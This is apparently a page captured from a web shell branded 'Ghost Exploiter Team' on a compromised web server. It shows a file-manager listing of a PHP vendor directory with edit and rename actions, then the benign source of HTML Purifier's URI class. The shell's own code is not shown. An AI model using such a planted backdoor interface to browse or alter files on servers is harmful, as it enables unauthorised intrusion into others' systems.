Shell Bypass 403 GE-C666C

Ghost Exploiter Team Official

Directory >> /var/www/html/back/vendor/ezyang/htmlpurifier/library/HTMLPurifier/

File / Folder	Size	Action
.	-
AttrDef	--	ren
AttrTransform	--	ren
ChildDef	--	ren
ConfigSchema	--	ren
DefinitionCache	--	ren
EntityLookup	--	ren
Filter	--	ren
HTMLModule	--	ren
Injector	--	ren
Language	--	ren
Lexer	--	ren
Node	--	ren
Printer	--	ren
Strategy	--	ren
TagTransform	--	ren
Token	--	ren
URIFilter	--	ren
URIScheme	--	ren
VarParser	--	ren
Arborize.php	2.49KB	edt ren
AttrCollections.php	4.748KB	edt ren
AttrDef.php	5.073KB	edt ren
AttrTransform.php	1.942KB	edt ren
AttrTypes.php	3.662KB	edt ren
AttrValidator.php	6.419KB	edt ren
Bootstrap.php	2.637KB	edt ren
CSSDefinition.php	19.489KB	edt ren
ChildDef.php	1.522KB	edt ren
Config.php	31.065KB	edt ren
ConfigSchema.php	5.757KB	edt ren
ContentSets.php	5.473KB	edt ren
Context.php	2.363KB	edt ren
Definition.php	1.329KB	edt ren
DefinitionCache.php	3.821KB	edt ren
DefinitionCacheFactory.php	3.119KB	edt ren
Doctype.php	1.545KB	edt ren
DoctypeRegistry.php	4.117KB	edt ren
ElementDef.php	7.354KB	edt ren
Encoder.php	25.106KB	edt ren
EntityLookup.php	1.393KB	edt ren
EntityParser.php	9.801KB	edt ren
ErrorCollector.php	7.446KB	edt ren
ErrorStruct.php	1.849KB	edt ren
Exception.php	0.173KB	edt ren
Filter.php	1.587KB	edt ren
Generator.php	10.012KB	edt ren
HTMLDefinition.php	17.166KB	edt ren
HTMLModule.php	9.956KB	edt ren
HTMLModuleManager.php	15.469KB	edt ren
IDAccumulator.php	1.608KB	edt ren
Injector.php	8.795KB	edt ren
Language.php	5.92KB	edt ren
LanguageFactory.php	6.298KB	edt ren
Length.php	3.801KB	edt ren
Lexer.php	12.711KB	edt ren
Node.php	1.25KB	edt ren
PercentEncoder.php	3.481KB	edt ren
Printer.php	5.759KB	edt ren
PropertyList.php	2.718KB	edt ren
PropertyListIterator.php	0.873KB	edt ren
Queue.php	1.515KB	edt ren
Strategy.php	0.744KB	edt ren
StringHash.php	1.073KB	edt ren
StringHashParser.php	3.556KB	edt ren
TagTransform.php	1.072KB	edt ren
Token.php	2.173KB	edt ren
TokenFactory.php	3.026KB	edt ren
URI.php	10.367KB	edt ren
URIDefinition.php	3.35KB	edt ren
URIFilter.php	2.31KB	edt ren
URIParser.php	2.24KB	edt ren
URIScheme.php	3.399KB	edt ren
URISchemeRegistry.php	2.353KB	edt ren
UnitConverter.php	9.908KB	edt ren
VarParser.php	5.85KB	edt ren
VarParserException.php	0.153KB	edt ren
Zipper.php	4.338KB	edt ren

<?php

/**
 * HTML Purifier's internal representation of a URI.
 * @note
 *      Internal data-structures are completely escaped. If the data needs
 *      to be used in a non-URI context (which is very unlikely), be sure
 *      to decode it first. The URI may not necessarily be well-formed until
 *      validate() is called.
 */
class HTMLPurifier_URI
{
    /**
     * @type string
     */
    public $scheme;

/**
     * @type string
     */
    public $userinfo;

/**
     * @type string
     */
    public $host;

/**
     * @type int
     */
    public $port;

/**
     * @type string
     */
    public $path;

/**
     * @type string
     */
    public $query;

/**
     * @type string
     */
    public $fragment;

/**
     * @param string $scheme
     * @param string $userinfo
     * @param string $host
     * @param int $port
     * @param string $path
     * @param string $query
     * @param string $fragment
     * @note Automatically normalizes scheme and port
     */
    public function __construct($scheme, $userinfo, $host, $port, $path, $query, $fragment)
    {
        $this->scheme = is_null($scheme) || ctype_lower($scheme) ? $scheme : strtolower($scheme);
        $this->userinfo = $userinfo;
        $this->host = $host;
        $this->port = is_null($port) ? $port : (int)$port;
        $this->path = $path;
        $this->query = $query;
        $this->fragment = $fragment;
    }

/**
     * Retrieves a scheme object corresponding to the URI's scheme/default
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return HTMLPurifier_URIScheme Scheme object appropriate for validating this URI
     */
    public function getSchemeObj($config, $context)
    {
        $registry = HTMLPurifier_URISchemeRegistry::instance();
        if ($this->scheme !== null) {
            $scheme_obj = $registry->getScheme($this->scheme, $config, $context);
            if (!$scheme_obj) {
                return false;
            } // invalid scheme, clean it out
        } else {
            // no scheme: retrieve the default one
            $def = $config->getDefinition('URI');
            $scheme_obj = $def->getDefaultScheme($config, $context);
            if (!$scheme_obj) {
                if ($def->defaultScheme !== null) {
                    // something funky happened to the default scheme object
                    trigger_error(
                        'Default scheme object "' . $def->defaultScheme . '" was not readable',
                        E_USER_WARNING
                    );
                } // suppress error if it's null
                return false;
            }
        }
        return $scheme_obj;
    }

/**
     * Generic validation method applicable for all schemes. May modify
     * this URI in order to get it into a compliant form.
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return bool True if validation/filtering succeeds, false if failure
     */
    public function validate($config, $context)
    {
        // ABNF definitions from RFC 3986
        $chars_sub_delims = $config->get('URI.AllowedSymbols');
        $chars_gen_delims = ':/?#[]@';
        $chars_pchar = $chars_sub_delims . ':@';

// validate host
        if (!is_null($this->host)) {
            $host_def = new HTMLPurifier_AttrDef_URI_Host();
            $this->host = $host_def->validate($this->host, $config, $context);
            if ($this->host === false) {
                $this->host = null;
            }
        }

// validate scheme
        // NOTE: It's not appropriate to check whether or not this
        // scheme is in our registry, since a URIFilter may convert a
        // URI that we don't allow into one we do.  So instead, we just
        // check if the scheme can be dropped because there is no host
        // and it is our default scheme.
        if (!is_null($this->scheme) && is_null($this->host) || $this->host === '') {
            // support for relative paths is pretty abysmal when the
            // scheme is present, so axe it when possible
            $def = $config->getDefinition('URI');
            if ($def->defaultScheme === $this->scheme) {
                $this->scheme = null;
            }
        }

// validate username
        if (!is_null($this->userinfo)) {
            $encoder = new HTMLPurifier_PercentEncoder($chars_sub_delims . ':');
            $this->userinfo = $encoder->encode($this->userinfo);
        }

// validate port
        if (!is_null($this->port)) {
            if ($this->port < 1 || $this->port > 65535) {
                $this->port = null;
            }
        }

// validate path
        $segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/');
        if (!is_null($this->host)) { // this catches $this->host === ''
            // path-abempty (hier and relative)
            // http://www.example.com/my/path
            // //www.example.com/my/path (looks odd, but works, and
            //                            recognized by most browsers)
            // (this set is valid or invalid on a scheme by scheme
            // basis, so we'll deal with it later)
            // file:///my/path
            // ///my/path
            $this->path = $segments_encoder->encode($this->path);
        } elseif ($this->path !== '') {
            if ($this->path[0] === '/') {
                // path-absolute (hier and relative)
                // http:/my/path
                // /my/path
                if (strlen($this->path) >= 2 && $this->path[1] === '/') {
                    // This could happen if both the host gets stripped
                    // out
                    // http://my/path
                    // //my/path
                    $this->path = '';
                } else {
                    $this->path = $segments_encoder->encode($this->path);
                }
            } elseif (!is_null($this->scheme)) {
                // path-rootless (hier)
                // http:my/path
                // Short circuit evaluation means we don't need to check nz
                $this->path = $segments_encoder->encode($this->path);
            } else {
                // path-noscheme (relative)
                // my/path
                // (once again, not checking nz)
                $segment_nc_encoder = new HTMLPurifier_PercentEncoder($chars_sub_delims . '@');
                $c = strpos($this->path, '/');
                if ($c !== false) {
                    $this->path =
                        $segment_nc_encoder->encode(substr($this->path, 0, $c)) .
                        $segments_encoder->encode(substr($this->path, $c));
                } else {
                    $this->path = $segment_nc_encoder->encode($this->path);
                }
            }
        } else {
            // path-empty (hier and relative)
            $this->path = ''; // just to be safe
        }

// qf = query and fragment
        $qf_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/?');

if (!is_null($this->query)) {
            $this->query = $qf_encoder->encode($this->query);
        }

if (!is_null($this->fragment)) {
            $this->fragment = $qf_encoder->encode($this->fragment);
        }
        return true;
    }

/**
     * Convert URI back to string
     * @return string URI appropriate for output
     */
    public function toString()
    {
        // reconstruct authority
        $authority = null;
        // there is a rendering difference between a null authority
        // (http:foo-bar) and an empty string authority
        // (http:///foo-bar).
        if (!is_null($this->host)) {
            $authority = '';
            if (!is_null($this->userinfo)) {
                $authority .= $this->userinfo . '@';
            }
            $authority .= $this->host;
            if (!is_null($this->port)) {
                $authority .= ':' . $this->port;
            }
        }

// Reconstruct the result
        // One might wonder about parsing quirks from browsers after
        // this reconstruction.  Unfortunately, parsing behavior depends
        // on what *scheme* was employed (file:///foo is handled *very*
        // differently than http:///foo), so unfortunately we have to
        // defer to the schemes to do the right thing.
        $result = '';
        if (!is_null($this->scheme)) {
            $result .= $this->scheme . ':';
        }
        if (!is_null($authority)) {
            $result .= '//' . $authority;
        }
        $result .= $this->path;
        if (!is_null($this->query)) {
            $result .= '?' . $this->query;
        }
        if (!is_null($this->fragment)) {
            $result .= '#' . $this->fragment;
        }

return $result;
    }

/**
     * Returns true if this URL might be considered a 'local' URL given
     * the current context.  This is true when the host is null, or
     * when it matches the host supplied to the configuration.
     *
     * Note that this does not do any scheme checking, so it is mostly
     * only appropriate for metadata that doesn't care about protocol
     * security.  isBenign is probably what you actually want.
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return bool
     */
    public function isLocal($config, $context)
    {
        if ($this->host === null) {
            return true;
        }
        $uri_def = $config->getDefinition('URI');
        if ($uri_def->host === $this->host) {
            return true;
        }
        return false;
    }

/**
     * Returns true if this URL should be considered a 'benign' URL,
     * that is:
     *
     *      - It is a local URL (isLocal), and
     *      - It has a equal or better level of security
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return bool
     */
    public function isBenign($config, $context)
    {
        if (!$this->isLocal($config, $context)) {
            return false;
        }

$scheme_obj = $this->getSchemeObj($config, $context);
        if (!$scheme_obj) {
            return false;
        } // conservative approach

$current_scheme_obj = $config->getDefinition('URI')->getDefaultScheme($config, $context);
        if ($current_scheme_obj->secure) {
            if (!$scheme_obj->secure) {
                return false;
            }
        }
        return true;
    }
}

// vim: et sw=4 sts=4